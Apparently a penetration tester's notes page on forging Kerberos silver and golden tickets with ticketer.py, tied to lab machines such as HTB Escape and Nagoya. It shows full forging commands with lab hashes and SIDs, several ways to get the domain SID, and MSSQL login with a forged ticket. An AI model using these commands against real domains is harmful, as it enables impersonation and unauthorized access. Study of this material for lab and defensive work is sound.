# Silver Ticket Attack

After getting a shell through xp\_cmdshell we usually hold **SeImpersonatePrivilege** and can go straight to a potato attack. Sometimes the intended path is instead to enumerate the database and work back to a service account hash, which is where the silver ticket comes in.

Refer to PG Practice Nagoya and Escape from HTB. Just because ticketer.py generates a ticket does not mean it works: the SPN host must belong to the domain you forge for, and the domain SID must be right. Check the domain first:

```
get-addomain
```

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FUWc67dh0df9oNF3lzmp1%2FSilver%20Ticket%20Attack.png?alt=media&#x26;token=01bd349a-615e-40b0-b62e-37ece35d1e10" alt=""><figcaption></figcaption></figure>

This is the domain (and DomainSID) we use for the silver ticket. If the credentials came from Kerberoasting, CHECK the GetUserSPNs.py output for the exact SPN, and remember that ticketer.py takes the account's NT hash (`-nthash`), not the cracked password.

**General syntax:**

```
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
```

**Without `-spn` a Golden Ticket (a TGT) is created.** That only works if the hash is the krbtgt account's NT hash; a TGT forged with a service account's hash is rejected by the KDC:

```
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb administrator
```

**With an SPN specified we get a service ticket for that service only.** The ticket is encrypted with the service account's key, so the service accepts it without asking the DC.

The user name does not even need to exist (the service trusts whatever is in the PAC unless it validates the PAC with the DC), so a fake user works as well:

```
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn TotesLegit/dc.sequel.htb administrator
```

To list existing SPNs from a domain-joined PowerShell session:

```
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object ServicePrincipalName
```

Example: silver ticket for the MSSQL service on Nagoya:

```
ticketer.py -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administrator
```

## Get SID

To get the domain SID:

```
nxc ldap DC1.scrm.local -u <user> -p <pass> -k --get-sid
```

or

```
lookupsid.py test.local/john:password123@10.10.10.1
```

or

```
get-addomain
```

or

```
python3 getPac.py -targetUser administrator domain/user:pass
```

Use that value as `-domain-sid`. It can also be read over LDAP: it is the `objectSid` attribute of the domain object itself.
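Added example, not part of the original notes: the domain SID is simply an account SID with its RID removed, so it can also be taken from `whoami /user` on the box or from the `[*] Domain SID is:` line of lookupsid.py. The helper below pulls it out of either kind of output and rejects well-known SIDs such as `S-1-5-32-544`, which are not domain SIDs. The sample outputs are constructed from the page's sequel.htb SID (the RID 1106 is made up); the function names are mine.

```python
import re

# Domain SID: S-1-5-21-<sub1>-<sub2>-<sub3>; account SID: the same plus a RID.
# Well-known SIDs (S-1-5-18, S-1-5-32-544, ...) are deliberately not matched.
_SID_RE = re.compile(r"\bS-1-5-21-\d+-\d+-\d+(?:-(\d+))?\b")


def is_domain_sid(sid: str) -> bool:
    """True for a bare domain SID (three sub-authorities, no RID)."""
    m = _SID_RE.fullmatch(sid.strip())
    return m is not None and m.group(1) is None


def split_account_sid(sid: str):
    """Return (domain_sid, rid); rid is None when `sid` is already the domain SID."""
    m = _SID_RE.fullmatch(sid.strip())
    if m is None:
        raise ValueError(f"not a domain SID or domain account SID: {sid!r}")
    if m.group(1) is None:
        return m.group(0), None
    return m.group(0).rsplit("-", 1)[0], int(m.group(1))


def domain_sid_from_text(text: str) -> str:
    """Pull the one domain SID out of tool output (whoami /user, lookupsid.py,
    nxc --get-sid, Get-ADDomain); raise if none or several different ones are present."""
    found = {split_account_sid(m.group(0))[0] for m in _SID_RE.finditer(text)}
    if len(found) != 1:
        raise ValueError(f"expected exactly one domain SID, found {sorted(found)}")
    return found.pop()


# Constructed sample outputs, modelled on the sequel.htb values used above.
WHOAMI_USER = """USER INFORMATION
----------------

User Name        SID
================ ==============================================
sequel\\sql_svc   S-1-5-21-4078382237-1492182817-2568127209-1106
"""

LOOKUPSID = """[*] Brute forcing SIDs at dc.sequel.htb
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
500: sequel\\Administrator (SidTypeUser)
"""

if __name__ == "__main__":
    print(domain_sid_from_text(WHOAMI_USER))
    print(domain_sid_from_text(LOOKUPSID))
    print(split_account_sid("S-1-5-21-4078382237-1492182817-2568127209-1106"))
```

`whoami /user` is the cheapest source when you already have a shell as the service account: no extra tooling, and the SID it prints is the same domain SID ticketer.py needs once the trailing RID is dropped.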

## MSSQL

```
KRB5CCNAME=administrator.ccache mssqlclient.py -k Administrator@dc.sequel.htb
```

Just press Enter on the empty password prompt (or add `-no-pass`). It is normal for `xp_cmdshell whoami` to return the service account (sql\_svc or similar) rather than Administrator: the ticket logs you into SQL Server as Administrator, but xp\_cmdshell runs as the Windows account the SQL Server service runs under.

```
export KRB5CCNAME=administrator.ccache
```

Check the ticket is loaded with `klist`.

The host you target must be the one in the SPN (here `dc.sequel.htb`) and must resolve, so add it to `/etc/hosts` if needed. If Kerberos still cannot find the realm or KDC, edit `/etc/krb5.conf`. Example:

```
[libdefaults]
    default_realm = NAGOYA-INDUSTRIES.COM
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
    fcc-mit-ticketflags = true

[realms]
    NAGOYA-INDUSTRIES.COM = {
        kdc = nagoya.nagoya-industries.com
    }

[domain_realm]
    .nagoya-industries.com = NAGOYA-INDUSTRIES.COM
```
